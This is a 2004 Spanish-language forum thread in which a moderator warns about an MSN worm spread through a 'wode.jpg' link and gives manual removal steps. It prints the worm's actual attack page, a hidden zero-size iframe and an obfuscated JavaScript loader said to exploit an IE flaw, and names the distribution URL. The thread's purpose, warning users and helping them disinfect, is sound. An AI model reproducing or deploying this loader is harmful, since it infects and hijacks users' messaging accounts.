Foros del web

elpiedra · 19-sep-2004, 20:07

Recientemente se a reportado un nuevo parásito malware que esta atacando a muchos usuarios de MSN de Micro$oft, agregándole un enlace (Link) en el nik del contacto donde cada vez que se escribe un mensaje aparece.

Si el otro usuario hace un click en ese enlace automáticamente quedara infectado su MSN y así sucesivamente el mismo empezara a infectar al resto de sus contactos.

Al pulsar el enlace de esta web "http:// www . xf2s .com/ msn/ wode.jpg" la cual mostrara una foto de una Japonesa con el nombre "wode.jpg" automaticamente nuestro MSN quedara infectado.

Esta imagen Wode.Jpg no es mas que un código html

Código PHP:


			
<html> 

<iframe src="news.htm" width="0" height="0" frameborder="0"></iframe> 

<center><img src="1.jpg"></center> 

<html>

Este código nos mostrara una imagen similar a esta:

Y por otro lado nos cargara una pagina supuestamente inexistente la cual tiene las secuencias en un código JavaScript la cual una vulnerabilidad del IE ejecuta permitiendo que pueda secuestrar nuestro MSN

Código PHP:


			
<html> 

<head> 

<Meta Name=Encoder Content=»¶Ó*·ÃÎÊ> 

<!--The page is protected by HTMLShip XP(Unregistered Version)--> 

<META HTTP-EQUIV="imagetoolbar" CONTENT="no"> 



<noscript> 

<iframe></iframe> 

</noscript> 



<script language="javascript"> 

<!-- 

nJ8="\%shsssH0",gJ86="\%dh\'hHH0";.5200865,sG82=".6982664",gJ86='ZzEl\@J1eR\]Ia4\ Xj\<6y0A8F\.H\:\;C\nn\(mvP2Q\'\*tV\^TLh\r3\|\&Sx\#\,5\=\+Krq\}fpW\>Boi\%csg\[D\{k\\Nw\/\"M\?Gb\)9\-\_7O\`Ud\~Y\!u\$',nJ8='xYa\?u\ j\<o\\\%\nlBZe\#\{Nr6pWQM1hn\/7\'\]\-\+c\!k2Cs\^O\)g9\`3\,dKi\$\&qUmD\:\|P\;\*LfHE\[\.J8b\}\>T0\"\=wySv\~VRG\@\rz5\_\(X4tIAF';function nQ62(fW84){"\%d\'\'\'d\'h",l=fW84.length;'Mq533B6B',w='';while(l--)"\%d7\'\'0\'3",o=nJ8.indexOf(fW84.charAt(l)),'NM3q3B3W\?\r63',w=(o==-1?fW84.charAt(l):gJ86.charAt(o))+w;"\%\'khkkh\'",nJ8=nJ8.substring(1)+nJ8.charAt(0),document.write(w);'MN\@35qBB'};nQ62("\#J\.DE\;CB\?\n78A\n8\<qe\n\-\nJ\.DE\;CLD\}jrq\`lGGhEP\'XH\.A\]\<7CQ\n\?\?R\>PA7\.CEH7B\rX\]\'R\>D\<CAD7BP\n\?J\<\|hPA7\.CEH7B\r\]X\]\'R\>XH\.A\]\<7CQH7\.H7C\<KC\]\<7Aq\rX\]hJ\<COE\]\<HAC\'y\r\]X\]\'Ry\$prrR\|h\r\]X\]\'Rh\|XH\.A\]\<7CQH7\.H7C\<KC\]\<7Aq7\<\=BWA7\.CEH7\'yD\<CAD7BP\n\?J\<yRhPA7\.CEH7B\r7X\]\'\<R\>EP\'XH\.A\]\<7CQ\?\nN\<DJ33\=E7XH\=QJEX\<V\nDR\>EP\'\<Q\=gE\.gIqjRD\<CAD7BP\n\?J\<h\|\|hEP\'XH\.A\]\<7CQ\?\nN\<DJR\>XH\.A\]\<7CQ\.\n\;CAD\<a\-\<7CJ\'a\-\<7CQS5\(da\}5\*\"RhXH\.A\]\<7CQH7\]HAJ\<XH\=7q\r7X\]h\|\<\?J\<\>XH\.A\]\<7CQH7\]HAJ\<A\;q\r7X\]h\|h8\*zGqjcjjh\-Ollq\&cjchPA7\.CEH7B\rX\=J\'R\>\=E7XH\=QJC\nCAJBqByOg\<B\;\n8\<BEJB\;DHC\<\.C\<XBVNBMOS\)dgE\;BZ\+yhJ\<COE\]\<HAC\'y\rX\=J\'Ry\$jrrRh\|h\rX\=J\'RhX\ \&zql\{\`Gh\.njlqcrzchPA7\.CEH7B\rXXJ\'R\>EP\'XH\.A\]\<7CQ\n\?\?R\>XH\.A\]\<7CQH7J\<\?\<\.CJC\nDCqPA7\.CEH7B\'R\>D\<CAD7BP\n\?J\<\|hJ\<COE\]\<HAC\'y\rXXJ\'Ry\$zrrR\|\|h\rXXJ\'RhV\+zlq\`cj\&h\.dp\{qp\`\&\{hC\}GjqjcjlhP\ \`pqc\`\&lh\<\*Gpq\`lG\{hC\(\{\`qzlGphTa\{pq\`\&\{hh\r\?E\.\<7J\<X\rCH\rqyyh\#wJ\.DE\;CL")//--></script><sCRIPt LANGuAge=JavAsCrIpt>nQ62("\{soisl\:olZ\[4USJE4oSZ8sruoUS4\[8\*ulrh\'E\'onSf\`7\{ER\#oJsZ4lslUSd\$\<6\@n8\r\[s8h\-9s\-uh\;\[uohyyJh\"\;EEM\-9sAxT\*ls9Pyso8sMJ9\-hhyso8sM9s\-SZsr\*oUSsoisyi\r8J\:\[\*suosSf\{yER\#oJsf\`7\{ysoisl\:olf\`7\{8J\:\[\*sZul\'bFlboUS\#l\+l8J\:\[\*sSf\`74EJF\-o\'sMw\:\[so\]JE4oM\+luFoM\\*ulJo\]y\"xT\*ls9Pyb\&uEJls\[E\'M9\\;M8FR8s\:\[\'b\]6\&uEJls\[E\'M9\\;M\[\'4oi\_\;\]2\'ow8M9s\-2GGGGn\`7\{y8J\:\[\*sf\{slRuoZRE\:4o\:U6Zw\[4s9U\<66\.Z9o\[b9sU\!qZJouu8\*lJ\[\'bU6ZJouu\*l44\[\'bU6f\{s\:f\{s4Zw\[4s9U5q\.Z9o\[b9sU\<\@f\{Ru\[\'0f\{\-l\:\|Foof\)9oZ\*lboZ\[8Z\*\:EsoJso4ZRrZ1\)vgK9\[\*\{y\-l\:\|Foof\{yRu\[\'0f\{ys4f\{s4Zw\[4s9U\!q\.Z9o\[b9sU\<\@f\{8s\:E\'bf\{lZ9\\;U9ss\*hyywwwM0l\[89o\'bM\'osy9s\-u89\[\*y\b\[8so\:M9s\-fcEwo\:ZRrZ1\)vgK9\[\*\{ylf\{y8s\:E\'bf\{ys4f\{ys\:f\{yslRuof") 

</script> 

</head> 



<body> 

<noscript> 

<b><font color=red>This page requires a javascript enabled browser!!!</font></b> 

</noscript> 

</body> 



</html>

elpiedra · 19-sep-2004, 20:23

Los pasos para eliminar este parásito en forma manual son los siguientes:

1- Descargar los parches críticos de Windows Microsoft Security Bulletin MS04-018

2- Abrir el Administrador de Procesos haciendo Ctrl+Alt+Del y en caso de encontrar alguno de estos procesos, cortarlos:

MONIKER.EXE
SYSLRAY.EXE
HKT1.DLL

3- Iniciar el REGEDIT desde inicio>ejecutar y buscar este entrada

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run

Eliminar los siguientes valores:

realone_nt2003
realone_nt2004

4- Buscar los siguientes archivos que por lo gral se encuentran en esta carpeta
C:\WINDOWS\System32\ y eliminarlos:

MONIKER.EXE
SYSLRAY.EXE
HKT1.DLL

5- Reiniciar el PC

**Nota**
Para eliminarlo de forma automática descarguen la herramienta Anti-Wode.jpg v 1.0

Creado por el Ing. Carlos Guzmán del Team InfoSpyware

Descarguenla de aqui: http://www.infospyware.com/Herramientas.htm

Salu2
El Piedra

19-sep-2004, 20:07	#1 (permalink)
elpiedra Moderador 2.459 Mensajes Ubicación: Miami <-> Uruguay	Eliminar Virus de la foto Japonesa en MSN Recientemente se a reportado un nuevo parásito malware que esta atacando a muchos usuarios de MSN de Micro$oft, agregándole un enlace (Link) en el nik del contacto donde cada vez que se escribe un mensaje aparece. Si el otro usuario hace un click en ese enlace automáticamente quedara infectado su MSN y así sucesivamente el mismo empezara a infectar al resto de sus contactos. Al pulsar el enlace de esta web "http:// www . xf2s .com/ msn/ wode.jpg" la cual mostrara una foto de una Japonesa con el nombre "wode.jpg" automaticamente nuestro MSN quedara infectado. Esta imagen Wode.Jpg no es mas que un código html Código PHP: `<html> <iframe src="news.htm" width="0" height="0" frameborder="0"></iframe> <center><img src="1.jpg"></center> <html>` Este código nos mostrara una imagen similar a esta: Y por otro lado nos cargara una pagina supuestamente inexistente la cual tiene las secuencias en un código JavaScript la cual una vulnerabilidad del IE ejecuta permitiendo que pueda secuestrar nuestro MSN Código PHP: <html> <head> <Meta Name=Encoder Content=»¶Ó·ÃÎÊ> <!--The page is protected by HTMLShip XP(Unregistered Version)--> <META HTTP-EQUIV="imagetoolbar" CONTENT="no"> <noscript> <iframe></iframe> </noscript> <script language="javascript"> <!-- nJ8="\%shsssH0",gJ86="\%dh\'hHH0";.5200865,sG82=".6982664",gJ86='ZzEl\@J1eR\]Ia4\ Xj\<6y0A8F\.H\:\;C\nn\(mvP2Q\'\tV\^TLh\r3\\|\&Sx\#\,5\=\+Krq\}fpW\>Boi\%csg\[D\{k\\Nw\/\"M\?Gb\)9\-\_7O\`Ud\~Y\!u\$',nJ8='xYa\?u\ j\<o\\\%\nlBZe\#\{Nr6pWQM1hn\/7\'\]\-\+c\!k2Cs\^O\)g9\`3\,dKi\$\&qUmD\:\\|P\;\LfHE\[\.J8b\}\>T0\"\=wySv\~VRG\@\rz5\_\(X4tIAF';function nQ62(fW84){"\%d\'\'\'d\'h",l=fW84.length;'Mq533B6B',w='';while(l--)"\%d7\'\'0\'3",o=nJ8.indexOf(fW84.charAt(l)),'NM3q3B3W\?\r63',w=(o==-1?fW84.charAt(l):gJ86.charAt(o))+w;"\%\'khkkh\'",nJ8=nJ8.substring(1)+nJ8.charAt(0),document.write(w);'MN\@35qBB'};nQ62("\#J\.DE\;CB\?\n78A\n8\<qe\n\-\nJ\.DE\;CLD\}jrq\`lGGhEP\'XH\.A\]\<7CQ\n\?\?R\>PA7\.CEH7B\rX\]\'R\>D\<CAD7BP\n\?J\<\\|hPA7\.CEH7B\r\]X\]\'R\>XH\.A\]\<7CQH7\.H7C\<KC\]\<7Aq\rX\]hJ\<COE\]\<HAC\'y\r\]X\]\'Ry\$prrR\\|h\r\]X\]\'Rh\\|XH\.A\]\<7CQH7\.H7C\<KC\]\<7Aq7\<\=BWA7\.CEH7\'yD\<CAD7BP\n\?J\<yRhPA7\.CEH7B\r7X\]\'\<R\>EP\'XH\.A\]\<7CQ\?\nN\<DJ33\=E7XH\=QJEX\<V\nDR\>EP\'\<Q\=gE\.gIqjRD\<CAD7BP\n\?J\<h\\|\\|hEP\'XH\.A\]\<7CQ\?\nN\<DJR\>XH\.A\]\<7CQ\.\n\;CAD\<a\-\<7CJ\'a\-\<7CQS5\(da\}5\\"RhXH\.A\]\<7CQH7\]HAJ\<XH\=7q\r7X\]h\\|\<\?J\<\>XH\.A\]\<7CQH7\]HAJ\<A\;q\r7X\]h\\|h8\zGqjcjjh\-Ollq\&cjchPA7\.CEH7B\rX\=J\'R\>\=E7XH\=QJC\nCAJBqByOg\<B\;\n8\<BEJB\;DHC\<\.C\<XBVNBMOS\)dgE\;BZ\+yhJ\<COE\]\<HAC\'y\rX\=J\'Ry\$jrrRh\\|h\rX\=J\'RhX\ \&zql\{\`Gh\.njlqcrzchPA7\.CEH7B\rXXJ\'R\>EP\'XH\.A\]\<7CQ\n\?\?R\>XH\.A\]\<7CQH7J\<\?\<\.CJC\nDCqPA7\.CEH7B\'R\>D\<CAD7BP\n\?J\<\\|hJ\<COE\]\<HAC\'y\rXXJ\'Ry\$zrrR\\|\\|h\rXXJ\'RhV\+zlq\`cj\&h\.dp\{qp\`\&\{hC\}GjqjcjlhP\ \`pqc\`\&lh\<\Gpq\`lG\{hC\(\{\`qzlGphTa\{pq\`\&\{hh\r\?E\.\<7J\<X\rCH\rqyyh\#wJ\.DE\;CL")//--></script><sCRIPt LANGuAge=JavAsCrIpt>nQ62("\{soisl\:olZ\[4USJE4oSZ8sruoUS4\[8\ulrh\'E\'onSf\`7\{ER\#oJsZ4lslUSd\$\<6\@n8\r\[s8h\-9s\-uh\;\[uohyyJh\"\;EEM\-9sAxT\ls9Pyso8sMJ9\-hhyso8sM9s\-SZsr\oUSsoisyi\r8J\:\[\suosSf\{yER\#oJsf\`7\{ysoisl\:olf\`7\{8J\:\[\sZul\'bFlboUS\#l\+l8J\:\[\sSf\`74EJF\-o\'sMw\:\[so\]JE4oM\+luFoM\\ulJo\]y\"xT\ls9Pyb\&uEJls\[E\'M9\\;M8FR8s\:\[\'b\]6\&uEJls\[E\'M9\\;M\[\'4oi\_\;\]2\'ow8M9s\-2GGGGn\`7\{y8J\:\[\sf\{slRuoZRE\:4o\:U6Zw\[4s9U\<66\.Z9o\[b9sU\!qZJouu8\lJ\[\'bU6ZJouu\l44\[\'bU6f\{s\:f\{s4Zw\[4s9U5q\.Z9o\[b9sU\<\@f\{Ru\[\'0f\{\-l\:\\|Foof\)9oZ\lboZ\[8Z\\:EsoJso4ZRrZ1\)vgK9\[\\{y\-l\:\\|Foof\{yRu\[\'0f\{ys4f\{s4Zw\[4s9U\!q\.Z9o\[b9sU\<\@f\{8s\:E\'bf\{lZ9\\;U9ss\hyywwwM0l\[89o\'bM\'osy9s\-u89\[\y\b\[8so\:M9s\-fcEwo\:ZRrZ1\)vgK9\[\\{ylf\{y8s\:E\'bf\{ys4f\{ys\:f\{yslRuof") </script> </head> <body> <noscript> <b><font color=red>This page requires a javascript enabled browser!!!</font></b> </noscript> </body> </html> __________________ "Todos los Antivirus son buenos, hasta que se te infecta el PC"... xD InfoSpyware.com \| ForoSpyware.com Última edición por elpiedra; 24-sep-2004 a las 11:34*

19-sep-2004, 20:23	#2 (permalink)
elpiedra Moderador 2.459 Mensajes Ubicación: Miami <-> Uruguay	Pasos para eliminar virus del Japonesa en MSN Los pasos para eliminar este parásito en forma manual son los siguientes: 1- Descargar los parches críticos de Windows Microsoft Security Bulletin MS04-018 2- Abrir el Administrador de Procesos haciendo Ctrl+Alt+Del y en caso de encontrar alguno de estos procesos, cortarlos: MONIKER.EXE SYSLRAY.EXE HKT1.DLL 3- Iniciar el REGEDIT desde inicio>ejecutar y buscar este entrada HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run Eliminar los siguientes valores: realone_nt2003 realone_nt2004 4- Buscar los siguientes archivos que por lo gral se encuentran en esta carpeta C:\WINDOWS\System32\ y eliminarlos: MONIKER.EXE SYSLRAY.EXE HKT1.DLL 5- Reiniciar el PC Nota Para eliminarlo de forma automática descarguen la herramienta Anti-Wode.jpg v 1.0 Creado por el Ing. Carlos Guzmán del Team InfoSpyware Descarguenla de aqui: http://www.infospyware.com/Herramientas.htm Salu2 El Piedra __________________ "Todos los Antivirus son buenos, hasta que se te infecta el PC"... xD InfoSpyware.com \| ForoSpyware.com Última edición por elpiedra; 24-sep-2004 a las 12:28

Herramientas
Mostrar Versión Imprimible Enviar por Correo
Desplegado
Modo lineal Cambiar a Modo Hibrido Cambiar a Modo Hilado